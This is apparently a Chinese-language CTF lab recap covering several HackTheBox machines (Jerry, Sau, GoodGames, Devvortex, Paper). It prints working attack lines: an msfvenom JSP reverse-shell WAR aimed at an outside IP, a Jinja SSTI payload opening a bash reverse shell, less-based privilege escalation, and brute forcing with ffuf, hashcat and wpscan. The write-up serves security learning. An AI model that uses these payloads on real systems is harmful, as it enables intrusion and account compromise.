最近打了不少靶场，虽然难度都不算高，但也学到不少东西，中间去打了一周的实网渗透，打完后联系了一家企业准备面试，感觉面试准备的差不多了，回来继续打靶，打之前复个小盘总结一下。

jerry

从jerry开始，学到tomcat类的服务器都自带管理后台，可以搜相关路径爆破密码，接下来学着部署war包实现上传木马的功能，

jar -cvf test.war "test.jsp"

并且如果连接不上，还可以用msf生成war包打反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=43.155.67.230 LPORT=1234 -f war -o shell.war

接下来进去之后就拿到flag了，没有后续操作

Sau

接下来是sau，入口点在request baskets，就是一个流量转发工具，通过查找CVE达成了ssrf，获取80端口的访问权限。进来后同样截图丢给gpt，发现是maltrail，且存在未授权访问漏洞，利用网上下的脚本拿到shell，接下来准备提权，提权的过程比较简单，systemctl用于查看系统状态，又是suid权限，关键人自带的分页程序就是less，从这里学到一个骚技巧，就是长文本用less打提权

!/bin/bash

GoodGames

这个靶场入口点是sql注入，说实话我觉得这个漏洞在当下有点多余了，一个参数化查询就可以避免，但是不可否认的是它在当前的环境中确实还存在，所以有必要顺手测一测（大厂的产品除外）

接下来拿到了一个密码，md5解密，拿到管理员账号登录

没想到管理员登录后会有新的功能点（原来利用点在这啊

进去之后有一个修改资料页面，在这样的地方可以测一测ssti，通过ssti可以反弹shell

{{self.__init__.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/10.10.16.2/6666 0>&1'").read()}} 

反弹的shell不是真的终端，有一些功能限制，需要提升TTY

script -b /bin/bash -p /dev/null

进来之后发现root目录是空的，找不到flag，这里出现了比较震撼的一点，这玩意竟然是在docker里

先用ifconfig看看接口，发现主机ip，接着看看/etc/passwd，发现没有用户augus，但是home里有，说明可能是直接从主机挂载过来的（类似共享文件夹），查看挂载

mount | grep augustus

随后发现主机和挂载目录的权限共享，竟然可以主机建文件然后docker给它授权

bash从4.2开始会默认丢弃特权，-p参数保留有效uid和gid

devvotex

从这里开始学到虚拟主机技术，从HOST中添加域名字段爆破子域名

ffuf -u FUZZ.devvortex.htb -w /home/gw/桌面/test/fuzzDicts-master/subdomainDicts/main.txt -fc 302

进dev子域名后发现Joomla cms的未授权访问，拿到数据库中用户名和密码

进去之后接着搜漏洞去打拿shell，反弹shell如果msf打不通可以直接用curl命令

拿到hash密码后可以选择使用hashcat爆破或者在线网站解

hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

https://hashes.com/zh/decrypt/hash

进去之后借助less提权

paper

见到检测wordpress漏洞的工具wpscan，kali有自带的

枚举用户名

wpscan --url http://derpnstink.local/weblog -e u

爆破密码

wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt

但这里思路歪了，对网站本身的信息收集不够，应该往未授权查看草稿的方向去打

进来之后发现是一个聊天室rocket，这里版本比较高，直接用现成的是打不通了，但是这个bot有点问题，可以利用其访问一些文件

拿到.env环境下的rocket配置，猜测跟ssh的密码是一样的，尝试登录

进去之后传脚本打cve提权